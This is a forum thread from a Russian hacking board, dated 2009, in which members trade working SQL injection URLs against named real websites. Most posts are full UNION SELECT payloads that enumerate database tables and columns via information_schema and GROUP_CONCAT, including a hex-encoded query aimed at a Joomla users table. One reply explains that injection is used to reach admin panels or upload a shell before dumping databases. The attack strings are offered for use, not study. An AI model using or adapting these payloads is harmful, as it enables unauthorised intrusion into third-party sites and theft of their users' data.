Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.01.2009, 06:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Читать мою подпись - там на все случаи практически. Или ссылку сюда давай
|
|
|
29.01.2009, 08:43
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от jokester
Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
name,pass+FROM+table+limit+1,1
В чём вопрос, попробуй переформулировать
Спасибо за ответ.
Можно в таком случае привести пример на моем случае.
Есть порядка 12к записей.
Лимит не работает, просто не выводит данные и я не представляю перебирать лимитов такое количество.
p.s. Возможно я туплю, но что-то реальный ступор у меня...
|
|
|
|
29.01.2009, 11:56
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
F4R в слепой скуле только подзапросы, читай статьи по скулям, материала куча, практически в любой статье есть описание работы с подзапросами
Octave_Parango на каком твоём случае нужно превести пример? Ссылки нет. И что значит лимит не работает? Так не бывает к счастью ). Он просто не может не работать. А дамп базы через скуль, это вобщем никогда не было приятной процедурой(особенно когда вывод по одной записи). Скуль для этого вобщем-то не используют в основном. Через неё получают доступ в админку, или напрямую льют шелл, а потом уже дампят базу
|
|
|
|
29.01.2009, 12:53
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
не пойму как вывести через group_concat(),вот как делаю:
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(table_name%20separator%200?0a),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
вот уязвимость без group_concat():
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
|
|
|
|
29.01.2009, 12:56
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=1789 7669898768+union+select+1,2,3,4,group_concat(table _name),6,7,8,9,10,11,12,13,14,15+from+information_ schema.tables--
|
|
|
|
29.01.2009, 13:11
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
ага) а как разделить сменить на <br>
так получается
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3b),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
а так нет 
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+char(60,98,114,62)),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
|
|
|
|
29.01.2009, 13:16
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Так тебе нужно?
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=1789 7669898768+union+select+1,2,3,4,group_concat(conca t_ws(0x3a,table_name,column_name)+separator+0x3C62 723E),6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns--
|
|
|
|
29.01.2009, 13:45
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
Да, это! спасибо!
уммммм,хотелось бы посмотреть как выводить данные по кускам, ибо limit здесь не работает
пробовал substring в запросе - не прокатывает. Почитал о чем эти говорят:
http://forum.antichat.ru/threadnav46016-495-10.html (и предыдущая страница)
выводить только на первую букву тоже не катит если очень большая или мальенькая БД
а о чем еще способ, который предложил l1ght я вообще не вдуплю.
Есть какие предложения? |
|
|
|
29.01.2009, 16:38
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name='jos_users'/* не показывает колонки в табле чо делать?
|
|
|
|
29.01.2009, 16:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*
Скачать кодировщик
Последний раз редактировалось Pashkela; 29.01.2009 в 17:09..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
